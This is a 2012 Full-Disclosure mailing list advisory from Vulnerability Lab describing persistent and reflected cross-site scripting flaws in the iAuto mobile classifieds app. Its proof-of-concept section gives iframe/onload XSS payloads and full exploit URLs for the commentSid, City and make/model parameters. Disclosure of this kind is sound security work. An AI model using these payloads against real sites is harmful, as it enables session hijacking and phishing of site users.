[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] iAuto Mobile Application 2012 - Multiple Web Vulnerabilities

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] iAuto Mobile Application 2012 - Multiple Web Vulnerabilities
From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
Date: Mon, 06 Aug 2012 01:56:49 +0200
Title:
======
iAuto Mobile Application 2012 - Multiple Web Vulnerabilities


Date:
=====
2012-07-11


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=658


VL-ID:
=====
658


Common Vulnerability Scoring System:
====================================
3.5


Introduction:
=============
With Internet on mobile devices booming, having a desktop-oriented version is 
just not enough anymore. Empower your 
visitors with content designed for mobile Web by offering them a mobile version 
of your classifieds website.
WorksForWeb is offering custom-made mobile frontend addons for our classified 
solutions. The mobile version of your 
website will present all the data of the regular website in the format 
optimized for iPhone, Android, iPad, BlackBerry, 
Symbian, or other mobile devices. Mobile frontend addon features:

    Quick and advanced search,
    Browsing,
    Tabbed design,
    Multi-language interface,
    Google Maps,
    And much more

Addon is seamlessly integrated with your main website. Your website 
automatically detects mobile browsers to redirect 
mobile visitors to the mobile-optimized content. Why do you need a mobile 
gateway to your website? Because all the market 
leaders have mobile access, and so should you. The mobile technology is 
redefining our future, and you should be one step 
ahead of your smaller competitors. Mobile users now make up a large percentage 
of your target audience, and their needs 
to access information easily are important to address. At this moment, the 
mobile addon is compatible with classified 
solutions of v.5.2 and above. The price of the mobile frontend addon is only 
$175. This price includes a free expert 
installation on your server.

(Copy of the Vendor Homepage: 
http://www.worksforweb.com/classifieds-software/addons/mobile-addon/ )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple cross site 
vulnerabilities in the iAuto Mobile APP for Android, iOS & Blackberry.


Report-Timeline:
================
2012-07-10:     Public or Non-Public Disclosure


Status:
========
Published


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
1.1
A persistent input validation vulnerability is detected in the iAuto Mobile APP 
for Android, iOS (iPhone), Ericsson & Blackberry.
The bugs allow remote attackers to implement/inject malicious script code on 
the application side (persistent). The persistent vulnerability 
is located in comments module with the bound vulnerable commentSid parameter. 
Successful exploitation of the vulnerability can lead to session 
hijacking (manager/admin) or stable (persistent) context manipulation. 
Exploitation requires low user inter action & privileged user account.

Vulnerable Module(s):
                                [+] Comments > Reply to The Comment Listing

Vulnerable Parameter(s):
                                [+] commentSid & commentInfo


1.2
Multiple non persistent cross site scripting vulnerabilities are detected in 
the iAuto Mobile APP for Android, iOS (iPhone), Ericsson & Blackberry.
The vulnerability allows remote attackers to hijack website customer, moderator 
or admin sessions with medium or high required user inter action or 
local low privileged user account. The bugs are located in the  Dealer > Search 
Sellers or Browse by Make and Model with the bound vulnerable 
parameters city & path/url. Successful exploitation can result in account 
steal, client side phishing & client-side content request manipulation. 
Exploitation requires medium or high user inter action & without privileged web 
application user account.


Vulnerable Module(s):
                                [+] Dealer > Search Sellers > City
                                [+] Browse by Make and Model > /../ >

Vulnerable Parameter(s):
                                [+] City
                                [+] Folder Access Listing


Proof of Concept:
=================
1.1
The persistent vulnerabilities can be exploited by remote attackers with low 
privileged user account and with low required user inter action. 
For demonstration or reproduce ...


Review:  Add Comments - Listing

<div class="addComment">
<h1>Reply to The Comment</h1>
<div class="pageDescription">
<div class="commentInfo">You are replying to the comment 
#"><iframe 
src="iAuto%20%20%20Listing%20Comments%20Reply%20to%20The%20Comment-Dateien/[PERSISTENT
 INJECTED CODE!])' <="" to="" 
listing="" #448="" "<span="" class="fieldValue fieldValueYear" height="900" 
width="1000">2007</span>
<span class="fieldValue fieldValueMake">Acura</span> 



1.2
The client side cross site scripting vulnerabilities can be exploited by remote 
attackers with medium or highr equired user inter action.
Fo demonstration or reproduce ...

String: "><iframe src=http://vuln-lab.com width=1000 height=900 
onload=alert("VulnerabilityLab") <

Dealer > Search Sellers > City

PoC:
http://iauto.xxx.com/iAuto/m/users/search/?DealershipName[equal]=jamaikan-hope23&City[equal]=%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+
width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3C&State[equal]=11&action=search


Browse by Make and Model / AC Cobra / >

PoC:
http://iauto.xxx.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20
width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/


Comments > Reply to The Comment > Topic & Text (commentSid)

PoC:
http://iauto.xxx.com/iAuto/m/comment/add/?listingSid=448&commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000
%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C&returnBackUri=%2Flisting%2Fcomments%2F448%2F%3F



Risk:
=====
1.1
The security risk of the persistent input validation vulnerability is estimated 
as medium(+).

1.2
The security risk of the non-persistent cross site scripting vulnerabilities 
are estimated as low(+)|(-)medium.


Credits:
========
Vulnerability Laboratory [Research Team]  -    Benjamin Kunz Mejri 
(bkm@xxxxxxxxxxxxxxxxxxxxx)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
               - www.vulnerability-lab.com/register
Contact:    admin@xxxxxxxxxxxxxxxxxxxxx         - support@xxxxxxxxxxxxxxxxxxxxx 
               - research@xxxxxxxxxxxxxxxxxxxxx
Section:    video.vulnerability-lab.com         - forum.vulnerability-lab.com   
               - news.vulnerability-lab.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab 
               - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@xxxxxxxxxxxxxxxxxxxxx or 
support@xxxxxxxxxxxxxxxxxxxxx) to get a permission.

                                        Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Prev by Date: [Full-disclosure] Inout Mobile Webmail APP - Multiple Web Vulnerabilities
Next by Date: [Full-disclosure] VMware Vendor Service - Multiple Web Vulnerabilities
Previous by thread: [Full-disclosure] Inout Mobile Webmail APP - Multiple Web Vulnerabilities
Next by thread: [Full-disclosure] VMware Vendor Service - Multiple Web Vulnerabilities
Index(es):
- Date
- Thread